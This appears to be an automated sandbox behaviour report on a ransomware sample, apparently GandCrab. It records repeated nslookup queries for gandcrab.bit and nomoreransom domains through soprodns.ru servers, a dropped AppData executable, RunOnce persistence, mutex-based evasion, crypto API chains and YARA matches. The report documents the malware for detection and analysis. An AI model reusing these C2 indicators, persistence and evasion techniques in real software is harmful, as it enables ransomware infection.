Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\O8ZHhytWhn.exe "C:\Users\user\Desktop\O8ZHhytWhn.exe"
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe "C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe"
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe "C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe"
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.evad.winEXE@89/2@278/1

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe

Code function: 0_2_0F1D7330 VirtualAlloc,VirtualAlloc,GetUserNameW,VirtualAlloc,GetComputerNameW,wsprintfW,VirtualAlloc,wsprintfW,VirtualAlloc,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,lstrcmpiW,wsprintfW,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,GetNativeSystemInfo,VirtualAlloc,wsprintfW,ExitProcess,wsprintfW,VirtualAlloc,VirtualAlloc,GetWindowsDirectoryW,GetVolumeInformationW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,GetModuleHandleW,GetProcAddress,lstrlenW,VirtualFree,lstrcatW,VirtualAlloc,GetDriveTypeW,lstrcatW,lstrcatW,lstrcatW,GetDiskFreeSpaceW,lstrlenW,wsprintfW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,VirtualFree,

0_2_0F1D7330

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe

Code function: 0_2_0F1D7A10 wsprintfW,VirtualAlloc,VirtualAlloc,VirtualAlloc,VirtualAlloc,CreateToolhelp32Snapshot,VirtualFree,Process32FirstW,lstrcmpiW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,Process32NextW,GetLastError,lstrlenW,VirtualFree,VirtualFree,FindCloseChangeNotification,VirtualFree,

0_2_0F1D7A10

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3116:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1840:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5588:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6012:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5708:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2300:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5944:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5184:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5928:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5376:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:160:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2800:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3144:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:588:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4908:120:WilError_01
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\pc_group=WORKGROUP&ransom_id=4afbeea82d32d45
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2980:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1352:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4824:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4372:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1836:120:WilError_01

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: O8ZHhytWhn.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH

Data Obfuscation

Yara detected ReflectiveLoader

Source: Yara match	File source: O8ZHhytWhn.exe, type: SAMPLE
Source: Yara match	File source: 9.0.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.0.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.O8ZHhytWhn.exe.f1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.O8ZHhytWhn.exe.f1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.wjaoab.exe.fbc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.289867124.000000000FBCA000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000000.308674547.000000000FBCA000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.248569401.000000000F1DA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: O8ZHhytWhn.exe PID: 5900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wjaoab.exe PID: 5444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wjaoab.exe PID: 2888, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe, type: DROPPED

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe

Code function: 0_2_0F1D8150 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,

0_2_0F1D8150

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe

Jump to dropped file

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce wzugsdsqebh	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce wzugsdsqebh	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce wzugsdsqebh	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce wzugsdsqebh	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

graph_9-1758

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe TID: 4528	Thread sleep count: 40 > 30			Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe TID: 4528	Thread sleep time: -40000s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Evaded block: after key decision			graph_9-2012
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Evaded block: after key decision			graph_25-2012

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Code function: EnumDeviceDrivers,K32EnumDeviceDrivers,VirtualAlloc,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,	0_2_0F1D2F50
